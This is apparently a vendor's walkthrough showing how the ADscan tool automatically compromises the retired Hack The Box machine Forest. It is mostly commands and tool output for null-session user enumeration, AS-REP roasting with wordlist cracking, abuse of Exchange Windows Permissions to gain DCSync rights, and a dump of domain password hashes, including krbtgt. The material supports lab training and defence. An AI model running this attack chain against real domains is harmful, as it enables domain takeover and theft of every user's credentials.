🌲 Forest - Auto-Pwn Walkthrough
Automatically compromise HTB Forest using ADscan through AS-REP Roasting and Exchange Permissions abuse
Lab Information
- Platform: Hack The Box
- Machine: Forest (Retired)
- Difficulty: Easy
- OS: Windows Server 2016
- Domain: htb.local
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run
adscan installto pull the ADscan runtime image.
Before starting this lab, verify your environment:
adscan check
adscan install # if the check reports missing images or Docker issuesEnsure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically
tun0)
Attack Overview
Forest is vulnerable to:
- AS-REP Roasting - Initial access via account without pre-authentication
- BloodHound Analysis - Discover privilege escalation path
- WriteDacl Abuse - Exploit Exchange permissions to grant DCSync rights
- DCSync Attack - Dump domain credentials including Administrator hash
Estimated time with ADscan: ~3 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan startOn first run (no workspaces yet), ADscan will prompt you to name a workspace.
⚠ No workspaces detected.
Enter name for a new workspace: : forest
✓ Workspace 'forest' created
ℹ Loading workspace data from: ~/.adscan/workspaces/forest
ℹ Variables loaded from ~/.adscan/workspaces/forest/variables.json
✓ Workspace data successfully processed for ~/.adscan/workspaces/forest
✓ Workspace 'forest' selected automatically as it's the only one.Scope: This walkthrough assumes you are already connected to the HTB VPN and can reach the Forest domain controller. From that point on, ADscan LITE automates the entire AD attack chain (initial access → Domain Admin → DCSync → flags).
For labs that require heavy web, reversing, or image puzzles before touching Active Directory, see Labs Scope & Coverage to understand where ADscan fits in the workflow.
Step 2: Configure Target
Set the scan parameters for Forest:
(ADscan:forest ~/.adscan/workspaces/forest) > set hosts 10.129.2.124
(ADscan:forest ~/.adscan/workspaces/forest) > set iface tun0
(ADscan:forest ~/.adscan/workspaces/forest) > set auto true ✓ Hosts configured: 10.129.2.124
✓ Interface configured: tun0 with IP: 10.10.14.192
✓ Auto mode configured: TrueStep 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:forest ~/.adscan/workspaces/forest) > start_unauthADscan will automatically discover the domain, enumerate users, attempt AS-REP roasting, and crack any discovered hashes.
3.1 Host Detection and Domain Discovery
ADscan begins by detecting the target and identifying the Active Directory domain:
ℹ Starting host detection on 10.129.2.124...
ℹ Starting smb scan
⚠ New domain found: htb.local
ℹ Updating DNS
✓ DNS resolution configured correctly for htb.local
✓ smb scan finished.ADscan performs an SMB scan to identify the domain controller and domain name. Forest responds on port 445 revealing the htb.local domain.
3.2 SMB Null Session Enumeration
ADscan tests for anonymous SMB access to enumerate users:
ℹ Checking for null sessions on SMB on the domain htb.local
⚠ null session accepted successfully for domain htb.local.
ℹ Creating a SMB user list
✓ 19 Users found.The domain controller allows null session authentication (no credentials required). This is a common misconfiguration that enables anonymous user enumeration via RPC/SMB.
Security Issue: Null sessions allow unauthenticated attackers to enumerate domain users, which can be used for password spraying or AS-REP roasting attacks.
3.3 AS-REP Roasting Attack
With the user list obtained, ADscan checks which accounts have Kerberos pre-authentication disabled:
ℹ Searching for AS-REP roastable users in domain htb.local
╭────────────────────────────────────────────────────────────╮
│ Asreproastable Users in htb.local (Guest) │
│ ╭────────────────────────────────────────────────────────╮ │
│ │ svc-alfresco │ │
│ ╰────────────────────────────────────────────────────────╯ │
╰────────────────────────────────────────────────────────────╯ADscan found that the svc-alfresco account has the "Do not require Kerberos preauthentication" flag set. This allows requesting an AS-REP hash without providing credentials.
Technical detail: When pre-authentication is disabled, anyone can request a Kerberos AS-REP ticket for that user. The response contains encrypted data using the user's password, which can be cracked offline.
3.4 Automatic Hash Cracking
ADscan automatically attempts to crack the extracted hash:
ℹ Using rockyou as the default wordlist.
⚠ Cracking asreproast hashes. Please be patient (this may take a while)
╭─────────────────── Hash Cracked ───────────────────╮
│ 🔓 Cracked Credentials │
│ ╭──────────────┬──────────╮ │
│ │ Username │ Password │ │
│ ├──────────────┼──────────┤ │
│ │ svc-alfresco │ s3rvice │ │
│ ╰──────────────┴──────────╯ │
╰────────────────────────────────────────────────────╯
✓ Kerberos TGT created successfully
ℹ Kerberos ticket generated for [email protected]- ADscan uses hashcat to crack the AS-REP hash against the rockyou wordlist
- Password cracked:
s3rvice(weak password) - ADscan automatically validates the credentials by requesting a Kerberos TGT
- Result: Initial access achieved as
svc-alfresco
Initial Access Achieved! We now have valid credentials: svc-alfresco:s3rvice
Step 4: Authenticated Enumeration (Automatic)
Once credentials are found, ADscan automatically pivots to authenticated enumeration.
4.1 Privilege Enumeration Prompts
ADscan asks if you want to perform deep privilege enumeration:
Do you want to enumerate privileges for user svc-alfresco? [y/n] (y): y
Do you want to enumerate privileges for user svc-alfresco on various services on hosts?
(⚠ WARNING: This will saturate the network if the number of hosts in domain htb.local is very high) [y/n]: yNetwork Impact: With set auto True, ADscan automates most of the safe workflow but always asks for confirmation before noisy or potentially disruptive operations. With set auto False, the mode is more guided and asks additional questions along the way, while still requiring explicit confirmation for any sensitive action.
4.2 Service Privilege Checks
ADscan tests which services the compromised account has access to:
SMB Enumeration:
ℹ Starting smb privilege enumeration for user svc-alfresco
✗ smb enumeration completed for user svc-alfresco. No hosts with privileges found.WinRM Enumeration:
ℹ Starting winrm privilege enumeration for user svc-alfresco
⚠ User svc-alfresco has winrm privileges on host 10.129.95.210
Do you want to enumerate host 10.129.95.210 via WinRM as user svc-alfresco? [y/n]: yADscan discovered that svc-alfresco can execute remote PowerShell commands via WinRM. This enables further enumeration and credential hunting on the domain controller.
4.3 WinRM Remote Enumeration
ADscan connects via WinRM to search for additional credentials:
ℹ Searching for Firefox files for user svc-alfresco
✗ No Firefox credential files found for user svc-alfresco
ℹ Obtaining PowerShell history for user svc-alfresco
✗ No PowerShell history found for the user.
ℹ Obtaining autologon credentials
✗ No autologon credentials found in the output.Credential hunting checks:
- Firefox credentials - Stored browser passwords
- PowerShell history - Previous commands that might contain passwords
- Autologon credentials - Registry keys with saved login information
All checks returned negative, so ADscan continues with ACL enumeration.
4.4 ACL Analysis and Permissions Discovery
ADscan analyzes Active Directory ACLs (Access Control Lists) to find privilege escalation paths:
ℹ Enumerating ACEs for user svc-alfresco on high-value targets
ℹ No actionable high-value ACEs found, retrying without --high-value...
ACLs for source: svc-alfresco, target: all, source domain: htb.local, target domain: all
================================================================================
Source: svc-alfresco
Source Type: User
Source Domain: htb.local
Target: SM_1b41c9286325456bb
Target Type: User
Target Domain: htb.local
Target Enabled: False
Relation: GenericAll
--------------------------------------------------------------------------------
Source: svc-alfresco
Source Type: User
Source Domain: htb.local
Target: Hygiene Management
Target Type: Group
Target Domain: htb.local
Relation: GenericAll
Target Enabled: True
--------------------------------------------------------------------------------ADscan is mapping all permissions that svc-alfresco has over other Active Directory objects. It found several GenericAll permissions, which grant full control over the target objects.
4.5 Critical Finding: Exchange Windows Permissions
ADscan identifies a critical privilege escalation path:
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y):CRITICAL VULNERABILITY: The svc-alfresco user has GenericAll permission on the Exchange Windows Permissions group. This is the key to Domain Admin!
Why this matters:
- GenericAll = Full control over the
Exchange Windows Permissionsgroup - Exchange Windows Permissions has
WriteDaclpermission on the domain object - WriteDacl on domain = Can modify domain ACLs to grant DCSync rights
- DCSync rights = Can dump all domain credentials including Administrator
Attack chain:
svc-alfresco (GenericAll)
→ Exchange Windows Permissions (WriteDacl on domain)
→ Grant DCSync to svc-alfresco
→ Dump Administrator hash
→ Domain Admin accessStep 5: Privilege Escalation (Automatic)
Once the critical Exchange Windows Permissions vulnerability is identified, ADscan automatically exploits the privilege escalation path to Domain Admin.
5.1 AddSelf Attack Execution
ADscan automatically adds the compromised user to the Exchange Windows Permissions group:
⚠ There is an ACE with GenericAll on 'Exchange Windows Permissions'
Do you want to exploit the GenericAll/GenericWrite privilege on Exchange Windows Permissions? [y/n] (y): y
ℹ Executing AddSelf attack
✓ User svc-alfresco successfully added to group Exchange Windows Permissions- ADscan leverages the
GenericAllpermission on theExchange Windows Permissionsgroup - The compromised account
svc-alfrescois added as a member of this privileged group - This group membership grants
WriteDaclpermissions on the domain object
Technical detail: GenericAll permission allows full control over an object, including modifying group membership. By adding ourselves to Exchange Windows Permissions, we inherit the group's domain-level WriteDacl permission.
5.2 WriteDacl Exploitation
With membership in Exchange Windows Permissions, ADscan grants DCSync rights:
ℹ Adding DCSync permissions to user svc-alfresco on the domain domain
✓ GenericAll added successfully- The
WriteDaclpermission allows modifying the domain object's security descriptor - ADscan adds two critical ACEs (Access Control Entries) to
svc-alfresco:- DS-Replication-Get-Changes (DCSync permission)
- DS-Replication-Get-Changes-All (Extended DCSync rights)
- These permissions allow replicating Active Directory data like a legitimate domain controller
Critical Privilege Escalation: With DCSync rights, any account can impersonate a domain controller and request password hashes for ANY domain user, including Domain Admins.
5.3 DCSync Attack
ADscan immediately performs a DCSync attack to extract the Administrator hash:
ℹ Performing DCSync for user Administrator
✓ Found credential: htb.local/Administrator with hash 32693b11e6aa90eb43d32c72a07ceea6- ADscan uses the DCSync permissions to request the Administrator account's password hash
- The domain controller responds with the NTLM hash:
32693b11e6aa90eb43d32c72a07ceea6 - This hash can be used for Pass-the-Hash attacks without cracking the password
Domain Admin Access Achieved! With the Administrator hash, we have complete control over the domain.
5.4 Automatic Flag Capture
ADscan automatically uses the Administrator hash to retrieve both user and root flags:
ℹ Obtaining flags from domain htb.local
╭──────┬─────────────────────────────────────────┬──────────────────────────────────╮
│ Type │ Path │ Flag │
├──────┼─────────────────────────────────────────┼──────────────────────────────────┤
│ user │ C:\Users\svc-alfresco\Desktop\user.txt │ 880c29bf5ed0c9***************** │
│ root │ C:\Users\Administrator\Desktop\root.txt │ ee60c94c65d7dc***************** │
╰──────┴─────────────────────────────────────────┴──────────────────────────────────╯- ADscan uses the Administrator hash to authenticate via WinRM or SMB
- Automatically locates and reads both user and root flag files
- User flag:
880c29bf5ed0c9***************** - Root flag:
ee60c94c65d7dc*****************
Machine Owned! Both flags captured. Forest has been completely compromised in approximately 3 minutes.
5.5 Complete Credential Dump
After capturing flags, ADscan performs a complete DCSync to dump all domain credentials:
ℹ Starting DCSync
ℹ Performing DCSync for all users...
✓ DCSync completed successfully.
ℹ Extracted 9 domain credentials. Extracted credentials for domain htb.local
╭──────────────────────┬──────────────────────────────────╮
│ User │ Credential │
├──────────────────────┼──────────────────────────────────┤
│ Administrator │ 32693b11e6aa90eb43d32c72a07ceea6 │
│ krbtgt │ 819af826bb148e603acb0f33d17632f8 │
│ $331000-VK4ADACQNUCA │ 31d6cfe0d16ae931b73c59d7e0c089c0 │
│ sebastien │ Ob********bi │
│ lucinda │ Th***************0l │
│ svc-alfresco │ s3***ce │
│ andy │ 29dfccaf39618ff101de5165b19d524b │
│ mark │ 9e63ebcb217bf3c6b27056fdcb6150f7 │
│ santi │ pl*******hb │
╰──────────────────────┴──────────────────────────────────╯- ADscan performs DCSync for every domain user account
- All NTLM hashes are extracted and stored in the workspace
- Complete domain credential database is now available for persistence or lateral movement
Extracted credential set (Forest lab example):
- 9 credentials - Administrator + krbtgt + AS-REP/Kerberoast targets and relevant users
- Administrator hash - Domain Admin access via Pass-the-Hash
- Masked cracked passwords - Cleartext partially hidden in LITE; full view in PRO
Full Domain Compromise Complete! ADscan has automatically:
- Gained initial access via AS-REP Roasting
- Escalated privileges through Exchange permissions abuse
- Achieved Domain Admin via DCSync attack
- Captured both user and root flags
- Dumped 9 domain credentials (including Administrator, krbtgt and cracked user accounts)
Total time: ~3 minutes in automatic mode
Attack Chain Breakdown
Vulnerability: The svc-alfresco account has Kerberos pre-authentication disabled.
ADscan automation:
- Enumerates domain users via RPC
- Identifies AS-REP roastable accounts
- Requests AS-REP hash for offline cracking
- Cracks hash using configured wordlists
- Validates credentials and gains initial access
Vulnerability: Complex group membership chain grants WriteDacl permissions on domain object.
Privilege escalation path:
svc-alfresco (Current User)
→ Service Accounts (Member)
→ Privileged IT Accounts (Member)
→ Account Operators (Member)
→ Exchange Windows Permissions (WriteDacl)
→ Domain Object (DCSync Rights)Vulnerability: Exchange Windows Permissions group has WriteDacl on the domain object.
ADscan automation:
- Creates temporary user account
- Adds user to Exchange Windows Permissions group
- Grants DCSync rights to the temporary user
- Performs DCSync attack to dump credentials
Technique: Use DCSync rights to replicate Administrator password hash.
Result:
- Full Domain Admin access via Pass-the-Hash
- Complete credential dump of all domain accounts
- User and root flags captured
Timing Breakdown
Automatic mode (set auto True):
- Unauthenticated scan: ~30 seconds
- Hash cracking: ~45 seconds
- Authenticated enumeration: ~30 seconds
- BloodHound collection: ~20 seconds
- Privilege escalation: ~40 seconds
- Total: ~2 minutes 45 seconds
Manual time: ~1h 23m 31s (HTB Forest first system blood benchmark) | ADscan time: ~3 minutes
Troubleshooting
Domain not found
Verify VPN connectivity to HTB network:
ping 10.10.10.161
ip addr show tun0Hash cracking failed
Use alternative wordlists or cracking tools:
# ADscan will prompt for custom wordlist
# You can also manually crack with John the Ripper if neededBloodHound upload failed
Ensure BloodHound CE is running and accessible:
adscan check
# If BloodHound isn't running, start it via:
adscan startAuthentication errors
Verify credentials were correctly captured:
(ADscan:forest ~/.adscan/workspaces/forest) > creds show # Check if svc-alfresco credentials are listedKey Learning Points
What ADscan Automated
- Reconnaissance: RPC null session user enumeration
- Initial Access: AS-REP roasting and offline hash cracking
- Post-Compromise Enumeration: BloodHound data collection
- Analysis: Automated attack path discovery
- Privilege Escalation: WriteDacl abuse and DCSync execution
- Post-Exploitation: Complete credential harvesting
Security Lessons
- Disable pre-authentication: High-risk configuration that enables AS-REP roasting
- Exchange permissions: Default Exchange installation grants excessive domain privileges
- Least privilege: Service accounts should not be in privileged groups
- Defense detection: Monitor for DCSync attempts and suspicious group modifications